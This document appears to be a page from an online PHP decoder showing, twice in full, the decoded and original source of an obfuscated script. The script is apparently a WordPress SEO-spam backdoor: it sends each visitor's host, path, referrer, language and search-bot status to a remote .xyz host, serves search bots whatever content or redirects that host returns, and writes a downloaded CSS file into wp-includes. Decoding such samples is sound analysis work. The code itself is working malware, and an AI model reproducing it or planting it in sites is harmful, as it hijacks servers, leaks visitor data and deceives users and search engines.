Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto oHLCF; Zk1HJ: if (isset($_SERVER["HTTP_REFERER"])) { $h8 = $_SERVER["HTTP_..
Decoded Output download
<?php
goto oHLCF; Zk1HJ: if (isset($_SERVER["HTTP_REFERER"])) { $h8 = $_SERVER["HTTP_REFERER"]; $h8 = $h8; } goto uprfX; ikOMI: if ($q3 == "/" || strstr($q3, "ewttm")) { fcss($y11, $l14, $o15); } goto dlhVJ; fVY0d: $s7 = $s7; goto ibyIF; ibyIF: $h8 = ''; goto Zk1HJ; TeaZQ: $l14 = $y9 . "/" . $s10 . "/" . $x13; goto EPyov; mOdyn: if (is_dir($y9 . "/wp-includes")) { $s10 = "wp-includes/css"; } else { $s10 = "css"; } goto b26dj; pHvq6: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto xZeU6; oHLCF: $h0 = "%75%77%6F%76%67%65%6E%65%6C%6D%74%2E%63%66%6E%79%62%72%6D%68%2E%6B%6C%6D"; goto neqA4; gWHdh: if (is_https()) { $b2 = "https"; } else { $b2 = "http"; } goto jFvhc; xZeU6: $d6 = $_SERVER["HTTP_HOST"]; goto SIVfn; WQofW: if (is_file($l14)) { $f29 = $j1 . "://" . $i5 . "/indexnew.php?css=1"; } else { $f29 = $j1 . "://" . $i5 . "/indexnew.php"; } goto ltkfu; FetnQ: if (substr($d6, 0, 4) == "www.") { $b12 = substr($d6, 4); } else { $b12 = $d6; } goto AyLgg; yDkUt: if ($q3 == '') { $q3 = "/"; } goto EAK1K; KE_Jo: if (!strstr($d30, "nobotuseragent")) { if (strstr($d30, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); if (file_exists($l14)) { $g31 = file_get_contents($l14); $d30 = str_replace("[##linkcss##]", $g31, $d30); } else { $d30 = str_replace("[##linkcss##]", '', $d30); } $d30 = str_replace("okhtmlgetcontent", '', $d30); echo $d30; die; } else { if (strstr($d30, "okxmlgetcontent")) { $d30 = str_replace("okxmlgetcontent", '', $d30); @header("Content-type: text/xml"); echo $d30; die; } else { if (strstr($d30, "pingxmlgetcontent")) { $d30 = str_replace("pingxmlgetcontent", '', $d30); fcss($y11, $l14, $o15); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($d30); die; } else { if (strstr($d30, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($d30, "getcontent404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($d30, "getcontent301page")) { @header("HTTP/1.1 301 Moved Permanently"); $d30 = str_replace("getcontent301page", '', $d30); header("Location: " . $d30); die; } } } } } } } goto TeegB; uprfX: if (isset($_SERVER["DOCUMENT_ROOT"])) { $y9 = $_SERVER["DOCUMENT_ROOT"]; } else { $y9 = dirname(__FILE__); } goto mOdyn; VlI_F: function doutdo($e16) { $i23 = ''; if (!$i23) { $i23 = @file_get_contents($e16); } return $i23; } goto vyLBV; dlhVJ: $u28 = array("web" => $d6, "zz" => disbot(), "uri" => $j4, "urlshang" => $h8, "http" => $b2, "lang" => $s7); goto WQofW; EAK1K: $j4 = $q3; goto msoou; AyLgg: $x13 = str_rot13(substr($b12, 0, 3) . substr($i5, 0, 3)) . ".css"; goto TeaZQ; vyLBV: function doutdo_post($c24, $e25) { $h26 = curl_init(); curl_setopt($h26, CURLOPT_URL, $c24); curl_setopt($h26, CURLOPT_POST, 1); curl_setopt($h26, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($h26, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h26, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h26, CURLOPT_HEADER, 0); curl_setopt($h26, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h26, CURLOPT_POSTFIELDS, $e25); $a27 = curl_exec($h26); curl_close($h26); return $a27; } goto EwF7x; EPyov: $o15 = $j1 . "://" . $i5 . "/temp/style.css"; goto h9mJG; TE7p0: $i5 = "hjbitraryzg.psaloezu.xyz"; goto pHvq6; EwF7x: function fcss($y11, $l14, $o15) { if (is_dir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } else { if (@mkdir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } } } goto ikOMI; b26dj: $y11 = $y9 . "/" . $s10; goto FetnQ; E0A_c: function disbot() { $y22 = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($y22, "googlebot") || stristr($y22, "bing") || stristr($y22, "yahoo") || stristr($y22, "google") || stristr($y22, "Googlebot") || stristr($y22, "googlebot")) { return true; } else { return false; } } goto VlI_F; h9mJG: function ping_sitemap($e16) { $x17 = explode("\xd\xa", trim($e16)); $j18 = ''; foreach ($x17 as $g19) { $w20 = doutdo($g19); $t21 = strpos($w20, "Sitemap Notification Received") !== false ? "pingok" : "error"; $j18 .= $g19 . "-- " . $t21 . "<br>"; } return $j18; } goto E0A_c; jFvhc: $q3 = drequest_uri(); goto yDkUt; ltkfu: $d30 = trim(doutdo_post($f29, $u28)); goto KE_Jo; msoou: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $j4 = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $j4; } goto TE7p0; neqA4: $j1 = "http"; goto gWHdh; SIVfn: $s7 = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto fVY0d; TeegB: ?>
Did this file decode correctly?
Original Code
<?php
goto oHLCF; Zk1HJ: if (isset($_SERVER["HTTP_REFERER"])) { $h8 = $_SERVER["HTTP_REFERER"]; $h8 = $h8; } goto uprfX; ikOMI: if ($q3 == "/" || strstr($q3, "ewttm")) { fcss($y11, $l14, $o15); } goto dlhVJ; fVY0d: $s7 = $s7; goto ibyIF; ibyIF: $h8 = ''; goto Zk1HJ; TeaZQ: $l14 = $y9 . "/" . $s10 . "/" . $x13; goto EPyov; mOdyn: if (is_dir($y9 . "/wp-includes")) { $s10 = "wp-includes/css"; } else { $s10 = "css"; } goto b26dj; pHvq6: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto xZeU6; oHLCF: $h0 = "%75%77%6F%76%67%65%6E%65%6C%6D%74%2E%63%66%6E%79%62%72%6D%68%2E%6B%6C%6D"; goto neqA4; gWHdh: if (is_https()) { $b2 = "https"; } else { $b2 = "http"; } goto jFvhc; xZeU6: $d6 = $_SERVER["HTTP_HOST"]; goto SIVfn; WQofW: if (is_file($l14)) { $f29 = $j1 . "://" . $i5 . "/indexnew.php?css=1"; } else { $f29 = $j1 . "://" . $i5 . "/indexnew.php"; } goto ltkfu; FetnQ: if (substr($d6, 0, 4) == "www.") { $b12 = substr($d6, 4); } else { $b12 = $d6; } goto AyLgg; yDkUt: if ($q3 == '') { $q3 = "/"; } goto EAK1K; KE_Jo: if (!strstr($d30, "nobotuseragent")) { if (strstr($d30, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); if (file_exists($l14)) { $g31 = file_get_contents($l14); $d30 = str_replace("[##linkcss##]", $g31, $d30); } else { $d30 = str_replace("[##linkcss##]", '', $d30); } $d30 = str_replace("okhtmlgetcontent", '', $d30); echo $d30; die; } else { if (strstr($d30, "okxmlgetcontent")) { $d30 = str_replace("okxmlgetcontent", '', $d30); @header("Content-type: text/xml"); echo $d30; die; } else { if (strstr($d30, "pingxmlgetcontent")) { $d30 = str_replace("pingxmlgetcontent", '', $d30); fcss($y11, $l14, $o15); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($d30); die; } else { if (strstr($d30, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($d30, "getcontent404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($d30, "getcontent301page")) { @header("HTTP/1.1 301 Moved Permanently"); $d30 = str_replace("getcontent301page", '', $d30); header("Location: " . $d30); die; } } } } } } } goto TeegB; uprfX: if (isset($_SERVER["DOCUMENT_ROOT"])) { $y9 = $_SERVER["DOCUMENT_ROOT"]; } else { $y9 = dirname(__FILE__); } goto mOdyn; VlI_F: function doutdo($e16) { $i23 = ''; if (!$i23) { $i23 = @file_get_contents($e16); } return $i23; } goto vyLBV; dlhVJ: $u28 = array("web" => $d6, "zz" => disbot(), "uri" => $j4, "urlshang" => $h8, "http" => $b2, "lang" => $s7); goto WQofW; EAK1K: $j4 = $q3; goto msoou; AyLgg: $x13 = str_rot13(substr($b12, 0, 3) . substr($i5, 0, 3)) . ".css"; goto TeaZQ; vyLBV: function doutdo_post($c24, $e25) { $h26 = curl_init(); curl_setopt($h26, CURLOPT_URL, $c24); curl_setopt($h26, CURLOPT_POST, 1); curl_setopt($h26, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($h26, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h26, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h26, CURLOPT_HEADER, 0); curl_setopt($h26, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h26, CURLOPT_POSTFIELDS, $e25); $a27 = curl_exec($h26); curl_close($h26); return $a27; } goto EwF7x; EPyov: $o15 = $j1 . "://" . $i5 . "/temp/style.css"; goto h9mJG; TE7p0: $i5 = "hjbitraryzg.psaloezu.xyz"; goto pHvq6; EwF7x: function fcss($y11, $l14, $o15) { if (is_dir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } else { if (@mkdir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } } } goto ikOMI; b26dj: $y11 = $y9 . "/" . $s10; goto FetnQ; E0A_c: function disbot() { $y22 = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($y22, "googlebot") || stristr($y22, "bing") || stristr($y22, "yahoo") || stristr($y22, "google") || stristr($y22, "Googlebot") || stristr($y22, "googlebot")) { return true; } else { return false; } } goto VlI_F; h9mJG: function ping_sitemap($e16) { $x17 = explode("\xd\xa", trim($e16)); $j18 = ''; foreach ($x17 as $g19) { $w20 = doutdo($g19); $t21 = strpos($w20, "Sitemap Notification Received") !== false ? "pingok" : "error"; $j18 .= $g19 . "-- " . $t21 . "<br>"; } return $j18; } goto E0A_c; jFvhc: $q3 = drequest_uri(); goto yDkUt; ltkfu: $d30 = trim(doutdo_post($f29, $u28)); goto KE_Jo; msoou: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $j4 = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $j4; } goto TE7p0; neqA4: $j1 = "http"; goto gWHdh; SIVfn: $s7 = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto fVY0d; TeegB: ?>
Function Calls
None |
Stats
MD5 | 40c65093878f25ad411eb43eceeaafcd |
Eval Count | 0 |
Decode Time | 76 ms |